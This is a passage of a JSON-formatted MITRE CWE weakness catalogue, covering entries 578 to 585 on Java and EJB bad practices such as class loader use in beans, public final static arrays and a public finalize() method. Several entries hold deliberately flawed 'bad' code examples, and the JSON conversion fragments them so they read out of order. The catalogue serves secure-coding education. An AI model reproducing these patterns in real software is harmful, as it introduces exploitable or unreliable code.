versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"578":{"attr":{"@_ID":"578","@_Name":"EJB Bad Practices: Use of Class Loader","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using the class loader.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"The enterprise bean must not attempt to create a class loader; obtain the current class loader; set the context class loader; set security manager; create a new security manager; stop the JVM; or change the input, output, and error streams.\\" The specification justifies this requirement in the following way: \\"These functions are reserved for the EJB container. Allowing the enterprise bean to use these functions could compromise security and decrease the container\'s ability to properly manage the runtime environment.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use the Class Loader when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. The interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Class Loader for the EJB class to obtain the XML document from the local file system as an input stream.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Document interestRateXMLDocument = null;public InterestRateBean() {DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();} catch (IOException ex) {...}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ClassLoader loader = this.getClass().getClassLoader();InputStream in = loader.getResourceAsStream(Constants.INTEREST_RATE_FILE);","xhtml:br":["","","","",""],"xhtml:i":["// get XML document from the local filesystem as an input stream","// using the ClassLoader for this class"]}}}},{"#text":"DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXML(Integer points) {...}","xhtml:div":{"#text":"return getInterestRateFromXML(points);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["","","",""],"xhtml:i":"/* member function to retrieve interest rate from XML document on the local file system */"}}]}},"Body_Text":"This use of the Java Class Loader class within any kind of Enterprise JavaBean violates the restriction of the EJB specification against obtaining the current class loader as this could compromise the security of the application using the EJB."},{"Intro_Text":"An EJB is also restricted from creating a custom class loader and creating a class and instance of a class from the class loader, as shown in the following example.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class LoaderSessionBean implements LoaderSessionRemote {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public LoaderSessionBean() {}public class CustomClassLoader extends ClassLoader {}","xhtml:div":{"#text":"try {} catch (Exception ex) {...}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ClassLoader loader = new CustomClassLoader();Class c = loader.loadClass(\\"someClass\\");Object obj = c.newInstance();/* perform some task that uses the new class instance member variables or functions */...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}},"xhtml:br":["","","",""]}}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"579":{"attr":{"@_ID":"579","@_Name":"J2EE Bad Practices: Non-serializable Object Stored in Session","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores a non-serializable object as an HttpSession attribute, which can hurt reliability.","Extended_Description":"A J2EE application can make use of multiple JVMs in order to improve application reliability and performance. In order to make the multiple JVMs appear as a single application to the end user, the J2EE container can replicate an HttpSession object across multiple JVMs so that if one JVM becomes unavailable another can step in and take its place without disrupting the flow of the application. This is only possible if all session data is serializable, allowing the session to be duplicated between the JVMs.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In order for session replication to work, the values the application stores as attributes in the session must implement the Serializable interface."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following class adds itself to the session, but because it is not serializable, the session can no longer be replicated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DataGlob {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String globName;String globValue;public void addToSession(HttpSession session) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"session.setAttribute(\\"glob\\", this);","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"580":{"attr":{"@_ID":"580","@_Name":"clone() Method Without super.clone()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a clone() method that does not call super.clone() to obtain the new object.","Extended_Description":"All implementations of clone() should obtain the new object by calling super.clone(). If a class does not follow this convention, a subclass\'s clone() method will return an object of the wrong type.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Call super.clone() within your clone() method, when obtaining a new object."},{"Phase":"Implementation","Description":"In some cases, you can eliminate the clone method altogether and use copy constructors."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following two classes demonstrate a bug introduced by not calling super.clone(). Because of the way Kibitzer implements clone(), FancyKibitzer\'s clone method will return an object of type Kibitzer instead of FancyKibitzer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Kibitzer {}public class FancyKibitzer extends Kibitzer{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() throws CloneNotSupportedException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = new Kibitzer();...","xhtml:br":["",""]}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() throws CloneNotSupportedException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = super.clone();...","xhtml:br":["",""]}}}}],"xhtml:br":["",""]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous Clone Method","attr":{"@_Date":"2008-04-11"}}}},"581":{"attr":{"@_ID":"581","@_Name":"Object Model Violation: Just One of Equals and Hashcode Defined","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not maintain equal hashcodes for equal objects.","Extended_Description":"Java objects are expected to obey a number of invariants related to equality. One of these invariants is that equal objects must have equal hashcodes. In other words, if a.equals(b) == true then a.hashCode() == b.hashCode().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":"Other","Note":"If this invariant is not upheld, it is likely to cause trouble if objects of this class are stored in a collection. If the objects of the class in question are used as a key in a Hashtable or if they are inserted into a Map or Set, it is critical that equal objects have equal hashcodes."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Both Equals() and Hashcode() should be defined."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET09-J","Entry_Name":"Classes that define an equals() method must also define a hashCode() method"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Object Model Violation: Just One of Equals and Haschode Defined","attr":{"@_Date":"2008-01-30"}}}},"582":{"attr":{"@_ID":"582","@_Name":"Array Declared Public, Final, and Static","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program declares an array public, final, and static, which is not sufficient to prevent the array\'s contents from being modified.","Extended_Description":"Because arrays are mutable objects, the final constraint requires that the array object itself be assigned only once, but makes no guarantees about the values of the array elements. Since the array is public, a malicious program can change the values stored in the array. As such, in most cases an array declared public, final and static is a bug.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In most situations the array should be made private."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java Applet code mistakenly declares an array public, final and static.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"public final static URL[] urls;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":28,"Entry_Name":"Unexpected Access Points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Mobile Code: Unsafe Array Declaration","attr":{"@_Date":"2008-04-11"}}}},"583":{"attr":{"@_ID":"583","@_Name":"finalize() Method Declared Public","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program violates secure coding principles for mobile code by declaring a finalize() method public.","Extended_Description":"A program should never call finalize explicitly, except to call super.finalize() inside an implementation of finalize(). In mobile code situations, the otherwise error prone practice of manual garbage collection can become a security threat if an attacker can maliciously invoke a finalize() method because it is declared with public access.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If you are using finalize() as it was designed, there is no reason to declare finalize() with anything other than protected access."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java Applet code mistakenly declares a public finalize() method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"public void finalize() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}},"Body_Text":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Public Finalize Method","attr":{"@_Date":"2008-04-11"}}}},"584":{"attr":{"@_ID":"584","@_Name":"Return Inside Finally Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use a return statement inside the finally block. The finally block should have \\"cleanup\\" code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code excerpt, the IllegalArgumentException will never be delivered to the caller. The finally block will cause the exception to be discarded.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}finally {}","xhtml:div":[{"#text":"...throw IllegalArgumentException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return r;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR04-J","Entry_Name":"Do not complete abruptly from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"585":{"attr":{"@_ID":"585","@_Name":"Empty Synchronized Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an empty synchronized block.","Extended_Description":"An empty synchronized block does not actually accomplish any synchronization and may indicate a troubled section of code. An empty synchronized block can occur because code no longer needed within the synchronized block is commented out without removing the synchronized block.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1071","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"An empty synchronized block will wait until nobody else is using the synchronizer being specified. While this may be part of the desired 